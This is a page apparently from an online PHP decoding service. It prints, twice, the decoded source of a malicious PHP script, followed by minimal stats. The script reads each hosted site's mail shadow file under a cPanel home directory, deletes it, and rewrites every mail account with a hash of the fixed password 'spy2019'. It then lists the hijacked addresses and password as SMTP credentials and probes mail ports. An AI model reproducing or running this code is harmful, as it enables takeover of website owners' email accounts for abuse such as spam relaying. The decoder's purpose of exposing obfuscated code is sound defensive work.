Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1)..
Decoded Output download
<?php
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('memory_limit',-1);
// port to scan
$ports=array(25, 587, 465, 110, 995, 143 , 993);
$primary_port='25';
//curent user
$user=get_current_user();
// Smtp password
$password='spy2019';
//crypt
$pwd = crypt($password,'$6$spy2019$');
// host name
$t = $_SERVER['SERVER_NAME'];
//edit
$t = @str_replace("www.","",$t);
$dirs = glob('/home/'.$user.'/etc/*', GLOB_ONLYDIR);
foreach($dirs as $dir){
$ex = explode("/",$dir);
$site = $ex[count($ex)-1];
//get users
@$passwd = file_get_contents('/home/'.$user.'/etc/'.$site.'/shadow');
//edit
$ex=explode("
",$passwd);
//backup shadow
@link('/home/'.$user.'/etc/'.$site.'/shadow','/home/'.$user.'/etc/'.$site.'/shadow.spy2019.bak');
//delete shadow
@unlink('/home/'.$user.'/etc/'.$site.'/shadow');
// :D
foreach($ex as $ex){
$ex=explode(':',$ex);
$e= $ex[0];
if ($e){
$b=fopen('/home/'.$user.'/etc/'.$site.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."
");fclose($b);
echo $site.'|25|'.$e.'@'.$site.'|'.$password."</br>";
}}
//port scan
foreach ($ports as $port)
{
$connection = @fsockopen($site, $port, $errno, $errstr, 2);
if (is_resource($connection))
{
fclose($connection);
}
}
}
?>
Did this file decode correctly?
Original Code
<?php
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('memory_limit',-1);
// port to scan
$ports=array(25, 587, 465, 110, 995, 143 , 993);
$primary_port='25';
//curent user
$user=get_current_user();
// Smtp password
$password='spy2019';
//crypt
$pwd = crypt($password,'$6$spy2019$');
// host name
$t = $_SERVER['SERVER_NAME'];
//edit
$t = @str_replace("www.","",$t);
$dirs = glob('/home/'.$user.'/etc/*', GLOB_ONLYDIR);
foreach($dirs as $dir){
$ex = explode("/",$dir);
$site = $ex[count($ex)-1];
//get users
@$passwd = file_get_contents('/home/'.$user.'/etc/'.$site.'/shadow');
//edit
$ex=explode("\r\n",$passwd);
//backup shadow
@link('/home/'.$user.'/etc/'.$site.'/shadow','/home/'.$user.'/etc/'.$site.'/shadow.spy2019.bak');
//delete shadow
@unlink('/home/'.$user.'/etc/'.$site.'/shadow');
// :D
foreach($ex as $ex){
$ex=explode(':',$ex);
$e= $ex[0];
if ($e){
$b=fopen('/home/'.$user.'/etc/'.$site.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b);
echo $site.'|25|'.$e.'@'.$site.'|'.$password."</br>";
}}
//port scan
foreach ($ports as $port)
{
$connection = @fsockopen($site, $port, $errno, $errstr, 2);
if (is_resource($connection))
{
fclose($connection);
}
}
}
?>
Function Calls
ini_set | 2 |
set_time_limit | 1 |
get_current_user | 1 |
Stats
MD5 | 00b4ccfe05df3d586d36f8fbcbd98689 |
Eval Count | 0 |
Decode Time | 113 ms |